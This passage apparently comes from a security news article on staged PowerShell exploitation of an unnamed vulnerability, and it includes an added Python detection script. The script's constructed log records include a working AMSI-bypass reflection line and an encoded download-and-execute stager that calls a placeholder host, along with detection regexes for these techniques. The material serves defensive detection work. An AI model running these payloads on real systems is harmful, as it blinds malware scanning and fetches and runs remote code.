
The initial access attempts use publicly disclosed proof-of-concept (PoC) code as a base, GreyNoise says. Stage 1 payloads first run cheap proof-of-execution (PoE) probes (for example, a PowerShell arithmetic expression whose result confirms that remote code execution actually works) and then launch encoded PowerShell download-and-execute stagers. The stage 2 payload uses reflection to set System.Management.Automation.AmsiUtils.amsiInitFailed = true, a standard AMSI bypass that makes the Antimalware Scan Interface report that it failed to initialise so later script content is not scanned, and then uses iex (Invoke-Expression) to execute the next stage.
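The three stages described above leave distinct traces in PowerShell command-line (Event ID 4688) and script block (Event ID 4104) logging. The following detection script is an added example, not code from GreyNoise or from the article; it decodes -EncodedCommand payloads and tags each record with the stage indicators it matches (a bare arithmetic PoE probe, a download-and-execute stager, and the AmsiUtils/amsiInitFailed reflection bypass). The log records, the 198.51.100.7 address (TEST-NET-2) and the script names s1.ps1/s2.ps1 are constructed for the example and are not observed indicators.

```python
from __future__ import annotations

import base64
import re

# Added detection example for the staged PowerShell tradecraft described in the article.
# Everything below is constructed for illustration; no record here is captured data.

# -EncodedCommand and the abbreviations powershell.exe accepts (-e, -ec, -enc), then Base64
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Reflection-based AMSI bypass: touching AmsiUtils / amsiInitFailed is not routine admin activity
AMSI_RE = re.compile(r"AmsiUtils|amsiInitFailed", re.I)
# Download primitives plus the expression-evaluation cmdlet used to run the fetched stage
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
IEX_RE = re.compile(r"\biex\b|Invoke-Expression", re.I)
# Proof-of-execution probe: a script body that is nothing but one arithmetic expression
PROBE_RE = re.compile(r"^\s*\(?\s*\d+\s*[-+*/]\s*\d+\s*\)?\s*$")


def decode_encoded_command(text: str) -> str | None:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(text: str) -> list[str]:
    """Tag one command line or script block with the stage indicators it matches."""
    tags = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        tags.append("encoded_command")
        text = f"{text}\n{decoded}"  # inspect the decoded payload as well as the wrapper
    if PROBE_RE.match(text):
        tags.append("poe_probe")
    if DOWNLOAD_RE.search(text) and IEX_RE.search(text):
        tags.append("download_execute")
    if AMSI_RE.search(text):
        tags.append("amsi_bypass")
    return tags


def _encode(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage 1 stager; the host and path are placeholders, not real indicators.
STAGER = "$wc=New-Object Net.WebClient;iex $wc.DownloadString('http://198.51.100.7/s1.ps1')"

# Constructed records mirroring the stages in the article, plus one benign admin script.
SAMPLE_RECORDS = [
    ("4104 script block", "1337*2"),
    ("4688 command line", "powershell.exe -nop -w hidden -enc " + _encode(STAGER)),
    ("4104 script block",
     "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
     ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
     "iex $wc.DownloadString('http://198.51.100.7/s2.ps1')"),
    ("4104 script block",
     "Get-Service | Where-Object { $_.Status -eq 'Running' } | Export-Csv C:\\temp\\svc.csv"),
]


def scan(records=SAMPLE_RECORDS) -> list[tuple[str, list[str]]]:
    """Classify every record and return (source, tags) pairs for those that matched."""
    hits = []
    for source, text in records:
        tags = classify(text)
        if tags:
            hits.append((source, tags))
    return hits


if __name__ == "__main__":
    for source, tags in scan():
        print(f"{source}: {', '.join(tags)}")
```

The AMSI bypass only blinds the scan interface; script block logging still records the stage 2 text, so the amsi_bypass tag fires on the 4104 record provided that logging is enabled and the stager has not also disabled it. The arithmetic probe rule is deliberately narrow (a whole script body that is one expression) to avoid matching ordinary scripts that happen to contain arithmetic.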
JFrog’s security research team also reported today that it has found a working proof of concept that leads to code execution, and it and other researchers have reported finding fake PoCs containing malicious code on GitHub. “Security teams must verify sources before testing [these PoCs],” JFrog warns.
Amitai Cohen, attack vector intel lead at Wiz, also said today that the firm has seen both proof-of-concept exploits being published and active exploitation attempts in the wild. “Our threat teams have detected these attempts across customer environments, including deployments of cryptojacking malware and efforts to steal cloud credentials from compromised machines,” he said in an email.
